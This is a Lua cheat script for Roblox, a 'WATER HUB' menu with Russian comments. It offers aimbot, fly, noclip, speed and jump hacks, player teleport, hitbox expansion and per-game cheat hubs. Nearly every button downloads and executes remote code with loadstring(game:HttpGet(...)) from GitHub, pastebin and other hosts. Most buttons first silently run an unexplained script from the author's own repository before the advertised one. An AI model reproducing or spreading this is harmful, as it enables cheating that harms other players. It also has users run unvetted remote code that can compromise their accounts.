-- Простая система уведомлений (вставьте весь этот код)
local Notify = {}

-- Создаем GUI
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "SimpleNotifications"
screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
screenGui.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui")

local notificationsFolder = Instance.new("Folder")
notificationsFolder.Name = "Notifications"
notificationsFolder.Parent = screenGui

function Notify:Send(title, text, duration)
    duration = duration or 3
    
    -- Создаем уведомление
    local notification = Instance.new("Frame")
    notification.Name = "Notify"
    notification.Size = UDim2.new(0, 280, 0, 70)
    notification.Position = UDim2.new(1, 300, 1, -80)
    notification.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
    notification.BorderSizePixel = 0
    
    local corner = Instance.new("UICorner")
    corner.CornerRadius = UDim.new(0, 6)
    corner.Parent = notification
    
    local shadow = Instance.new("ImageLabel")
    shadow.Name = "Shadow"
    shadow.Size = UDim2.new(1, 10, 1, 10)
    shadow.Position = UDim2.new(0, -5, 0, -5)
    shadow.BackgroundTransparency = 1
    shadow.Image = "rbxassetid://5554236805"
    shadow.ScaleType = Enum.ScaleType.Slice
    shadow.SliceCenter = Rect.new(23,23,277,277)
    shadow.Parent = notification
    
    -- Заголовок
    local titleLabel = Instance.new("TextLabel")
    titleLabel.Name = "Title"
    titleLabel.Size = UDim2.new(1, -20, 0, 20)
    titleLabel.Position = UDim2.new(0, 10, 0, 10)
    titleLabel.BackgroundTransparency = 1
    titleLabel.Text = title
    titleLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
    titleLabel.Font = Enum.Font.GothamBold
    titleLabel.TextSize = 14
    titleLabel.TextXAlignment = Enum.TextXAlignment.Left
    titleLabel.Parent = notification
    
    -- Текст
    local textLabel = Instance.new("TextLabel")
    textLabel.Name = "Text"
    textLabel.Size = UDim2.new(1, -20, 0, 35)
    textLabel.Position = UDim2.new(0, 10, 0, 30)
    textLabel.BackgroundTransparency = 1
    textLabel.Text = text
    textLabel.TextColor3 = Color3.fromRGB(200, 200, 200)
    textLabel.Font = Enum.Font.Gotham
    textLabel.TextSize = 12
    textLabel.TextXAlignment = Enum.TextXAlignment.Left
    textLabel.TextYAlignment = Enum.TextYAlignment.Top
    textLabel.TextWrapped = true
    textLabel.Parent = notification
    
    -- Добавляем
    notification.Parent = notificationsFolder
    
    -- Анимация появления
    game:GetService("TweenService"):Create(
        notification,
        TweenInfo.new(0.5, Enum.EasingStyle.Quart, Enum.EasingDirection.Out),
        {Position = UDim2.new(1, -290, 1, -80)}
    ):Play()
    
    -- Функция закрытия
    local function close()
        game:GetService("TweenService"):Create(
            notification,
            TweenInfo.new(0.3, Enum.EasingStyle.Quart, Enum.EasingDirection.In),
            {Position = UDim2.new(1, 300, 1, -80)}
        ):Play()
        wait(0.3)
        notification:Destroy()
    end
    
    -- Авто-закрытие
    if duration > 0 then
        delay(duration, close)
    end
    
    return {Close = close}
end

-- Примеры использования:
wait(0,5)
Notify:Send("WELCOME", "WELCOME TO WATER HUB", 3)

-- Solara Disconnect с настройками
local Settings = {
    AutoDisconnect = false, -- true для автоматического отключения
    Delay = 3, -- Задержка в секундах
    ShowGUI = true -- Показывать интерфейс
}

local function SafeKick()
    pcall(function()
        game:GetService("Players").LocalPlayer:Kick("⚠️ emergency exit ⚠️")
    end)
end

local function SafeTeleport()
    pcall(function()
        game:GetService("TeleportService"):Teleport(0)
    end)
end

-- Основная функция отключения
local function PerformDisconnect()
    
    -- Пробуем разные методы
    SafeKick()
    wait(0.5)
    SafeTeleport()
    
end

-- Запуск в зависимости от настроек
if Settings.AutoDisconnect then
    wait(Settings.Delay)
    PerformDisconnect()
elseif Settings.ShowGUI then
    -- Создание простого GUI
    local gui = Instance.new("ScreenGui")
    local btn = Instance.new("TextButton")
    
    gui.Parent = game:GetService("CoreGui")
    btn.Parent = gui
    
    btn.Size = UDim2.new(0, 20, 0, 30)
    btn.Position = UDim2.new(0.5, -950, 0, 900)
    btn.BackgroundColor3 = Color3.fromRGB(255, 60, 60)
    btn.TextColor3 = Color3.fromRGB(255, 255, 255)
    btn.Text = "⚠️"
    btn.Font = Enum.Font.GothamBold
    btn.TextSize = 14
    
    btn.MouseButton1Click:Connect(function()
        btn.Text = "Отключаемся..."
        PerformDisconnect()
    end)
end

local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("🍉WATER HUB🍉", "Midnight")
--Main
local Tab = Window:NewTab("Main")

local MainSection = Tab:NewSection("Main")

MainSection:NewButton("Infinite Yield", "launch Infinite Yield Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end)
MainSection:NewButton("dex explorer", "launch dex explorer", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/MassiveHubs/loadstring/refs/heads/main/DexXenoAndRezware'))()
end)

MainSection:NewButton("Invisible", "launch Invisible Script", function()
   print("status:✅")
   loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
   loadstring(game:HttpGet('https://pastebin.com/raw/3Rnd9rHf'))()
end)

MainSection:NewButton("F3X tool", "give F3X tool", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:GetObjects("rbxassetid://6695644299")[1].Source)()
end)

MainSection:NewButton("Ctrl + Click-TP", "launch Create ctrl + Click-TP Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/ctrl%20%2B%20Click-TP'))()
end)

MainSection:NewButton("Wall Hop", "launch Wall Hop Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/wall%20hop'))()
end)

MainSection:NewButton("FLY", "launch FLY Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/FLY%20WATER%20HUB"))()
end)

MainSection:NewButton("Shaders", "launch Shaders Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/randomstring0/pshade-ultimate/refs/heads/main/src/cd.lua'))()
end)

MainSection:NewButton("Respawn", "Respawn", function()
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0, 0, 0)
end)

MainSection:NewKeybind("Скрыть/Показать GUI", "Прячет/показывает интерфейс", Enum.KeyCode.RightControl, function()
    Library:ToggleUI()
end)

MainSection:NewButton("Jerk Off", "possible ban in the experience", function()
    loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))()
end)

MainSection:NewButton("AimBot", "launch AimBot Script", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/aim'))()
end)
--MM2

local MM2 = Window:NewTab("Murder Mystery 2")

local MM2Section = MM2:NewSection("Murder Mystery 2")

MM2Section:NewButton("MM2 Admin Panel", "launch MM2 Admin Panel Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://pastebin.com/raw/e89Mn4Ec'))()
end)

MM2Section:NewButton("Vertex", "launch Vertex Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/vertex-peak/vertex/refs/heads/main/loadstring'))()
end)

MM2Section:NewButton("Overdrive H {There is a key}", "launch Overdrive H Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://pastebin.com/raw/e4iVr1WZ"))()
end)

MainSection:NewSlider("Player Speed", "SliderInfo", 1000, 16, function(s) -- 500 (MaxValue) | 0 (MinValue)
    game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s
end)

MM2Section:NewButton("TravHub", "launch TravHub Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/NoovaScripts/roblox/refs/heads/main/autofarm'))()
end)

MM2Section:NewButton("FRONT EVILL", "launch FRONT EVILL Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/Front-Evill/Script-Hub/refs/heads/main/GUI/index.lua"))()
end)

MM2Section:NewButton("Vexon Hub", "launch Vexon Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/DiosDi/VexonHub/refs/heads/main/VexonHub"))()
end)

-- 99 Nights in the Forest

local NITF = Window:NewTab("99 Nights in the Forest")

local NITFSection = NITF:NewSection("99 Nights in the Forest")

NITFSection:NewButton("Voidware", "launch Voidware Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/VapeVoidware/VW-Add/main/nightsintheforest.lua", true))()
end)

NITFSection:NewButton("VEX OP", "launch VEX OP Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/yoursvexyyy/VEX-OP/refs/heads/main/99%20nights%20in%20the%20forest"))()
end)

NITFSection:NewButton("Cobra Hub", "launch Cobra Hub Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/Backwoodsix/Cobra.gg-99-nights-in-the-Forrest-FREE-keyless-/refs/heads/main/.lua", true))()
end)

--baft

local baft = Window:NewTab("Build A Boat For Treasure")

local baftSection = baft:NewSection("Build A Boat For Treasure")

baftSection:NewButton("Script 1", "launch Script 1", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/TheRealAsu/BABFT/refs/heads/main/Source.lua'))("T.me/DeltaScripts")
end)

baftSection:NewButton("Weshky Hub", "launch Weshky Hub Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/suntisalts/WeshkyHub/refs/heads/main/MainLoader.lua"))()
end)

baftSection:NewButton("Build A Boat For Treasure.exe", "launch Build A Boat For Treasure.exe Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/XRoLLu/UWU/main/BUILD%20A%20BOAT%20FOR%20TREASURE.lua'))()
end)

--Jamp

-- Сохранение настроек
local Settings = {
    JumpHeight = 50,
    AutoApply = true
}

-- Функция применения высоты прыжка
function ApplyJumpHeight()
    local player = game.Players.LocalPlayer
    local character = player.Character
    if character then
        local humanoid = character:FindFirstChildOfClass("Humanoid")
        if humanoid then
            humanoid.JumpPower = Settings.JumpHeight
            print("Высота прыжка установлена: " .. Settings.JumpHeight)
        end
    end
end

-- Ползунок для высоты прыжка
local JumpSlider = MainSection:NewSlider(
    "jump height", 
    "jump height edit", 
    500, 
    50, 
    function(value)
        Settings.JumpHeight = value
        if Settings.AutoApply then
            ApplyJumpHeight()
        end
    end
)

-- Автоматическое применение при появлении персонажа
game.Players.LocalPlayer.CharacterAdded:Connect(function(character)
    character:WaitForChild("Humanoid")
    wait(0.5)
    if Settings.AutoApply then
        ApplyJumpHeight()
    end
end)

-- Применяем настройки при запуске
if game.Players.LocalPlayer.Character then
    ApplyJumpHeight()
end

--Inf Jump

local Settings = {
    Enabled = false,
    JumpPower = 50
}

MainSection:NewToggle("Infinite Jump", "launch Infinite Jump", function(state)
    Settings.Enabled = state
end)

-- Infinite Jump Logic
game:GetService("UserInputService").InputBegan:connect(function(input, gameProcessed)
    if gameProcessed then return end
    if input.KeyCode == Enum.KeyCode.Space and Settings.Enabled then
        local char = game.Players.LocalPlayer.Character
        if char then
            local hum = char:FindFirstChildOfClass("Humanoid")
            if hum and (hum:GetState() == Enum.HumanoidStateType.Freefall or hum:GetState() == Enum.HumanoidStateType.Jumping) then
                local root = char:FindFirstChild("HumanoidRootPart")
                if root then
                    local bv = Instance.new("BodyVelocity")
                    bv.Velocity = Vector3.new(0, Settings.JumpPower, 0)
                    bv.MaxForce = Vector3.new(0, math.huge, 0)
                    bv.Parent = root
                    game:GetService("Debris"):AddItem(bv, 0.1)
                end
            end
        end
    end
end)

--Tp 

local Players = game:GetService("Players")
local Player = Players.LocalPlayer

local Section = Tab:NewSection("Teleport to Players")

-- Online players buttons
for _, player in pairs(Players:GetPlayers()) do
    if player ~= Player then
        Section:NewButton(player.Name, "TP to " .. player.Name, function()
            if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
                if Player.Character and Player.Character:FindFirstChild("HumanoidRootPart") then
                    Player.Character.HumanoidRootPart.CFrame = player.Character.HumanoidRootPart.CFrame
                end
            end
        end)
    end
end

-- Murderers VS Sheriffs DUELS

local MSD = Window:NewTab("Murderers VS Sheriffs")

local MSDSection = MSD:NewSection("Murderers VS Sheriffs DUELS")

MSDSection:NewButton("Rinns Hub", "launch Rinns Hub Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/SkibidiCen/MainMenu/main/Code"))()
end)

MSDSection:NewButton("Hitbox", "launch Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet(('https://raw.githubusercontent.com/tcilo/Scripts/refs/heads/main/Murderers%20VS%20Sheriffs')))()
end)


MSDSection:NewButton("Vgxmod Hub", "launch Vgxmod Hub", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/VGXMOD99/SCRIPT-/main/Murder%20vs%20Sherif%20duel.txt"))()
end)

--RP

local RP = Window:NewTab("Brookhaven RP")

local RPSection = RP:NewSection("Brookhaven RP")

RPSection:NewButton("Solina 1.10", "launch Solina 1.10 Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://soluna-script.vercel.app/brookhaven.lua",true))()
end)

RPSection:NewButton("SP Hub", "launch SP Hub Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/as6cd0/SP_Hub/refs/heads/main/Brookhaven"))()
end)

RPSection:NewButton("Mada Hub", "launch Mada Hub Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://api.websim.com/blobs/01982795-f483-73f5-8de4-4446c9967fa5.txt"))()
end)

RPSection:NewButton("HavenXClient", "launch HavenXClient Script", function()
    print("status:✅")
    loadstring(game:HttpGet('https://raw.githubusercontent.com/m6225061-create/dadawawdw/refs/heads/main/adawda'))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/rkdavidadevelipe/MhzinClient/refs/heads/main/HavenXClient1.lua"))()
end)

--NoClip

-- Переменные
local noclip = false
local player = game.Players.LocalPlayer
local noclipConnection
local originalCollisions = {}

-- Функция для сохранения оригинальных коллизий
local function saveOriginalCollisions()
    if player.Character then
        originalCollisions = {}
        for _, v in pairs(player.Character:GetDescendants()) do
            if v:IsA("BasePart") then
                originalCollisions[v] = v.CanCollide
            end
        end
    end
end

-- Функция для восстановления оригинальных коллизий
local function restoreOriginalCollisions()
    if player.Character then
        for part, canCollide in pairs(originalCollisions) do
            if part and part.Parent then
                part.CanCollide = canCollide
            end
        end
        originalCollisions = {}
    end
end

-- Функция для включения NoClip
local function enableNoClip()
    if noclipConnection then
        noclipConnection:Disconnect()
    end
    
    saveOriginalCollisions()
    
    noclipConnection = game:GetService("RunService").Stepped:Connect(function()
        if noclip and player.Character then
            for _, v in pairs(player.Character:GetDescendants()) do
                if v:IsA("BasePart") then
                    v.CanCollide = false
                end
            end
        end
    end)
end

-- Функция для выключения NoClip
local function disableNoClip()
    if noclipConnection then
        noclipConnection:Disconnect()
        noclipConnection = nil
    end
    
    restoreOriginalCollisions()
end

-- Тоггл для NoClip
MainSection:NewToggle("NoClip", "launch NoClip", function(state)
    noclip = state
    if state then
        enableNoClip()
        Library:Notification("Safe NoClip", "NoClip включен!", "OK")
    else
        disableNoClip()
        Library:Notification("Safe NoClip", "NoClip выключен!", "OK")
    end
end)

-- Обработчик для нового персонажа
player.CharacterAdded:Connect(function(character)
    character:WaitForChild("HumanoidRootPart")
    wait(1) -- Даем время на полную загрузку персонажа
    if noclip then
        enableNoClip()
    else
        restoreOriginalCollisions()
    end
end)

-- Автоматическое выключение при удалении персонажа
player.CharacterRemoving:Connect(function()
    disableNoClip()
end)
